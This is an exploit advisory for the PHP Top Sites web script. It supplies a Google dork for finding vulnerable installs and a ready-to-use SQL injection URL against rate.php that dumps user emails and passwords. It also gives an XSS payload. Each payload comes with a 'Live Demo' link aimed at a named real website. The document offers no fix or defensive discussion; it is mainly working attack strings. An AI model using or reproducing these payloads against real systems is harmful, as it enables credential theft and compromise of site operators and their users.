<------------------- header data start ------------------- > ############################################################# PHP Top Sites Multiple SQL/XSS Vulnerability ############################################################# # Author : kAsvææ | c0de Hunters # Name : PHP Top Sites # Bug Type : SQL/XSS # Version :All # Google Dork:"Powered By PHP TopSites" # Home Page : http://itop10.net/ # You can download it : http://webscripts.softpedia.com/script/Top-Sites/PHP-TopSites-41994.html ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > SQL : "rate.php" (String SQL Injection) [EXPLOIT] : rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x [Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x XSS : "rate.php" [EXPLOIT] : rate.php?site="'> [Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=%22%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E < -- bug code end of -- >